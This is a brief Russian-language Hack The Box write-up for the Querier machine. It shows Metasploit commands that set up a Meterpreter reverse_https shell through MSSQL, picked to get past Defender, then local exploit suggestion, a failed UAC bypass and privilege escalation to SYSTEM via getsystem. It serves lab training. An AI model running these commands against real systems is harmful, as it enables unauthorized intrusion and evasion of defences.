# Отчет по заданию Querier (HTB)
**HTB Profile**: https://app.hackthebox.com/profile/activity/906355
**IP**: 10.10.10.125
...путь до исполнения кода через xp_cmdshell не описываю - всё было на занятии
## Далее
#### Backconnect
Т.к. работает Defender попробуем использовать шифрованное соединение с агентом meterpreter
```=
(msf) > use windows/mssql/mssql_payload
(msf) > set payload windows/x64/meterpreter/reverse_https
```
Получаем сессию, получаем флаг пользователя
### Повышение
Ищем возможность
```=
(msf) > use post/multi/recon/local_exploit_suggester
(msf) > run
...
...
[+] 10.10.10.125 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
```
Пробуем что нашлось
```=
(msf) > use exploit/windows/local/bypassuac_sdclt
(msf) > set session 18
(msf) > run
...
...
[-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module
```
Не сработало
Ищем дальше (и пробуем самое простое)
```=
(msf) > sessions -i 18 -C getsystem
[*] Running 'getsystem' on meterpreter session 18 (10.10.10.125)
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
```
#### DONE!
Флаг админа у нас